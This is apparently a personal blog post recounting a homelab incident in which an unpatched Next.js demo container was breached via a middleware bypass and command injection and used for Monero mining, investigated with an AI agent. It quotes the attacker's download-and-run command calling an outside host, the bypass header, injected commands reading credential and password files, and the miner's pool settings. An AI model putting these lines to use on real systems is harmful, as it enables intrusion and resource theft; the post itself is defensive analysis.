The Fan Was the SIEM - How I Found a Cryptominer in My Homelab
There’s a particular pitch a server fan hits when something on it is really unhappy. Not the steady whoosh of a transcoding job, not the ramp-up of a kernel build. A higher, sustained whine that says: eight cores, full tilt, and I am not consenting to this.
I was walking upstairs to my bedroom on a Wednesday evening when cyberpunk — the workhorse box in my homelab — started singing that note. I hadn’t kicked off anything heavy. So, over a Telegram voice message, I asked Hermes, my agent, to investigate.
What it found was a cryptominer that had been running for nineteen minutes.
This is the story of how it got in, how I caught it, and how a CTO and an AI agent worked an incident together at 11pm on a school night.
The discovery
The conversation started about as informally as security incidents ever begin:
“What’s cyberpunk doing? The CPU fan’s loud.”
Hermes peeked at the host through the Docker socket proxy and came back with a single damning line: load average 9.5, and a container called prism was eating 821% CPU. Prism was a demo Next.js app I’d stood up weeks earlier and forgotten about. It had no business doing anything, let alone melting eight cores.
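For reference, a minimal sketch of what that first peek boils down to (two commands, not Hermes' actual tooling):

```shell
# Host-level pressure: 1-, 5- and 15-minute load averages.
cat /proc/loadavg
# Per-container CPU, one snapshot instead of a live stream.
docker stats --no-stream --format 'table {{.Name}}\t{{.CPUPerc}}'
```

Anything pinned near (cores × 100)% in that second column is your suspect.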
A cat /proc/<pid>/cmdline later, the picture sharpened:
./npm_update -B -o 31.220.80.26:7777 \
-u 46RS6nKCGwRhndfpksLJomXuo4dZ7N9Afj3P1vHZxnwoQhHLw4yEzcocy1XseBdAvvb3Avx2o5PDKND8hdcRumi63ix8Ers \
-p prism
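One small detail worth knowing if you reproduce this: /proc/<pid>/cmdline separates arguments with NUL bytes, so a raw cat mashes them into one string. A quick tr makes it readable (the PID here is a placeholder):

```shell
# Replace each NUL separator with a space; 1234 is a placeholder PID.
tr '\0' ' ' < /proc/1234/cmdline; echo
```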
Three things tell you exactly what this is:
- The -o flag pointing at a TCP pool on port 7777
- A 95-character Monero wallet address
- The worker label -p prism — the attacker tagging the victim by name so they know which compromised box is paying which fraction of the rent
The binary was named npm_update, presumably because it sits visually adjacent to node, npm, and pm2 in a process list. Cute. Not enough.
This was XMRig, daemonised (-B), pointed at a German VPS at Hostpalace.
The entry vector
Once you know what is running, the next question is how. Hermes walked the container logs backward from the miner’s start time and the timeline assembled itself in about three minutes of investigation:
16:24 UTC — generic recon. /.git/config, /.env, /admin, /api/users. The kind of scan every public-facing app sees a hundred times a day.
Then this header showed up:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
That is the signature of CVE-2025-29927, a Next.js middleware authorisation bypass disclosed earlier in 2025. If your middleware is the only thing standing between an attacker and your authenticated API routes, that header walks straight past it. Prism was running Next.js 14.2.16. The fix shipped in 14.2.25 and 15.2.3. I had not patched.
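If you want to check your own app for exposure, a hedged probe looks like this (the hostname and route are placeholders; point it at an endpoint your middleware is supposed to protect):

```shell
# The repeated header value is the published bypass trigger for CVE-2025-29927.
curl -s -o /dev/null -w '%{http_code}\n' \
  -H 'x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware' \
  https://example.internal/api/secrets
```

A 200 on a route that should have returned 401 or 403 means the middleware just got walked past.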
The attacker pivoted to admin endpoints. /api/credentials and /api/secrets both returned 200 OK. Whatever was in there got read.
Then RCE. The container logs started showing Node.js errors of this shape:
Command failed: test -f /root/.env && cat /root/.env
Command failed: ls -la /etc/passwd && cat /etc/passwd
Those errors come from child_process.exec(). Somewhere in Prism’s admin API was a route that took user input and shoved it into a shell — classic command injection, chained off the middleware bypass.
The miner drop:
sh -c "cd /tmp && wget 31.220.80.26:8000/x86_64 -O npm_update \
&& chmod +x npm_update \
&& ./npm_update -B -o 31.220.80.26:7777 -u 46RS6n... -p prism"
The same VPS that hosted the mining pool also served the binary on port 8000. Lazy, but effective.
Containment
Here is the part of the story I’m proud of, and it has nothing to do with detection.
When I built the Prism stack, I did the boring things. The container ran unprivileged. No bind mounts. No Docker socket exposed. An isolated bridge network. No real secrets in its environment. None of those decisions were heroic — they’re table stakes — but they meant the blast radius of this compromise was exactly the Prism container and nothing else.
Hermes verified each one. It checked every other container on cyberpunk for outbound connections to 31.220.80.26 — none. It checked the other four hosts in the fleet — clean. It looked for a second-stage payload, persistence, lateral movement attempts. Nothing.
The attacker had landed in a sealed room.
docker stop prism
Nineteen minutes of mining ended. I left the container stopped rather than removed, so the writable layer froze in place for forensics. Hermes copied the binary out to /tmp/prism-evidence/, captured the SHA256 (b6d2cf8b3a16ab35e0c3cc1ab32afd6faf3f0adfe48a52b51ee3ce2f8c2bb70), saved the cmdline, dumped the container logs.
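The capture steps can be sketched in a few commands. This is an approximation of the procedure, not a transcript of what Hermes ran:

```shell
mkdir -p /tmp/prism-evidence
# The drop script put the binary at /tmp/npm_update inside the container.
docker cp prism:/tmp/npm_update /tmp/prism-evidence/npm_update
sha256sum /tmp/prism-evidence/npm_update > /tmp/prism-evidence/npm_update.sha256
docker logs prism > /tmp/prism-evidence/prism.log 2>&1
docker inspect prism > /tmp/prism-evidence/prism.inspect.json
```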
Then I went to bed.
The red herring
Worth telling, because it’s the most honest part of working with an agent.
Earlier the same evening — before the miner — I’d been unable to SSH into cyberpunk from my WireGuard IP. When the miner story broke, my first instinct was: the attacker pivoted, and now I’m locked out. Hermes built a confident story to match: CrowdSec had banned my IP, the firewall counter showed 794k drops, there was an ssh-bf alert, and so on.
It was wrong. All of it.
The actual cause was a UFW regression from a ufw-docker rollout I’d done four days earlier. The 192.168.3.0/24 allow rule for port 22 had been quietly dropped on two of five hosts. CrowdSec was busy banning real internet attackers — that 794k counter was Russian and Chinese SSH brute-forcers, not me.
When I pushed back, Hermes ran the verification commands that should’ve come first:
cscli alerts list --ip 192.168.3.4 -a -o json # empty
cscli decisions list -a | grep 192.168.3.4 # empty
Empty. Confident narrative, dead. We fixed the UFW rule on the two missing hosts, audited the other three, and Hermes patched the managing-brents-fleet skill with a new lesson: verify the actual drop point before naming a firewall culprit.
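The fix itself was one rule per affected host, plus a check that it actually landed. A sketch, with the subnet from the incident:

```shell
# Restore the LAN allow rule for SSH, then confirm it appears in the ruleset.
ufw allow from 192.168.3.0/24 to any port 22 proto tcp
ufw status numbered | grep 192.168.3.0/24
```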
I tell that part because it’s instructive. Agents will gladly weave plausible stories from circumstantial evidence. The fix is the same as it is for human engineers: push back, demand verification, prefer one tool call over a clever theory.
What I’d do differently
The unflattering list:
- A demo app sitting behind a Pangolin reverse proxy on the public internet, unpatched, with admin routes that took shell input. Each of those choices was fine in isolation. Stacked, they were a self-assembling exploit kit.
- No CPU-spike alerting. I detected this with my ears. That’s a fun anecdote but a terrible runbook. A 5-minute load > N alert into Telegram would have caught it before it caught me.
- No egress restrictions to known mining pool ranges on the host or the Pangolin VPS. Cheap, effective, would have made the miner unable to phone home.
- No Falco / auditd rules for the wget → chmod +x → exec drop pattern in /tmp. That sequence is essentially a signature for this entire genre of attack.
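The missing load alert is maybe ten lines of cron-able shell. A minimal sketch, assuming a Telegram bot whose BOT_TOKEN and CHAT_ID you supply yourself:

```shell
#!/bin/sh
# Alert when the 5-minute load average crosses a threshold.
THRESHOLD=${THRESHOLD:-8}
load5=$(cut -d' ' -f2 /proc/loadavg)
# awk handles the floating-point comparison portably in plain sh.
if [ "$(awk -v l="$load5" -v t="$THRESHOLD" 'BEGIN{print (l>t)}')" -eq 1 ]; then
  curl -s "https://api.telegram.org/bot${BOT_TOKEN}/sendMessage" \
    -d chat_id="${CHAT_ID}" \
    -d text="$(hostname): 5-min load ${load5} exceeds ${THRESHOLD}"
fi
```

Run it from cron every five minutes and the fan stops being the SIEM.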
What worked
- Container isolation. Boring, deeply unsexy, completely decisive.
- Evidence preservation by default. Stop, don’t remove. Future me will thank present me when the SHA256 lookup is useful.
- Working with the agent like a colleague. Not “Hermes, fix it.” More: “Pull this, verify that, show me the cmdline, prove the lateral movement claim.” Treat the agent as a fast pair of hands attached to a confident-but-fallible mouth, and you get good work out of it. Treat it as an oracle and you’ll cosign its hallucinations.
- Pushing back when something didn’t fit. The CrowdSec story was internally consistent and externally false. Two minutes of skepticism was worth more than twenty minutes of investigation built on a wrong premise.
The miner ran for nineteen minutes. The investigation took about ninety. The lesson was free, which is the only kind of security lesson worth celebrating: nothing important got owned, no real credentials leaked, and the only thing the attacker successfully extracted was a few cents of Monero and one good blog post.
I’ll take the trade.